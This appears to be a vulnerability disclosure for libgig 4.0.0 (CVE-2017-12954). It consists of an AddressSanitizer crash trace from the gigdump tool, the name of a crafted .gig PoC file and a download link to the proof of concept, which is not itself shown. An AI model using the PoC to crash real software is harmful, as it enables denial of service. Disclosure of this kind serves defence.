  ==44028== ERROR: AddressSanitizer: SEGV on unknown address 0x6009fc00ed70 (pc 0x7fea916446ac sp 0x7ffd026ec040 bp 0x0c08c0003ea3 T0)
  AddressSanitizer can not provide additional info.
  #0 0x7fea916446ab in gig::Region::GetSampleFromWavePool(unsigned int, RIFF::progress_t*) /home/a/Documents/libgig-4.0.0/src/gig.cpp:3850
  #1 0x7fea91670247 in gig::Region::Region(gig::Instrument*, RIFF::List*) /home/a/Documents/libgig-4.0.0/src/gig.cpp:2970
  #2 0x7fea91671f4a in gig::Instrument::Instrument(gig::File*, RIFF::List*, RIFF::progress_t*) /home/a/Documents/libgig-4.0.0/src/gig.cpp:4404
  #3 0x7fea91673fdc in gig::File::LoadInstruments(RIFF::progress_t*) /home/a/Documents/libgig-4.0.0/src/gig.cpp:5576
  #4 0x7fea916456a0 in gig::File::GetFirstInstrument() /home/a/Documents/libgig-4.0.0/src/gig.cpp:5378
  #5 0x40fca6 in PrintInstruments(gig::File*) /home/a/Documents/libgig-4.0.0/src/tools/gigdump.cpp:205
  #6 0x4027aa in main /home/a/Documents/libgig-4.0.0/src/tools/gigdump.cpp:79
  #7 0x7fea90c93ec4 (/lib/x86_64-linux-gnu/libc.so.6+0x21ec4)
  #8 0x402e5c in _start (/home/a/Documents/libgig-4.0.0/src/tools/.libs/gigdump+0x402e5c)
  SUMMARY: AddressSanitizer: SEGV /home/a/Documents/libgig-4.0.0/src/gig.cpp:3849 gig::Region::GetSampleFromWavePool(unsigned int, RIFF::progress_t*)
  ==44028== ABORTING
  
  
  POC:
  libgig_4.0.0_invalid_memory_read.gig
  CVE:
  CVE-2017-12954
  
  
  Proof of Concept:
  https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/42546.zip
  
  

  Bash

  Copy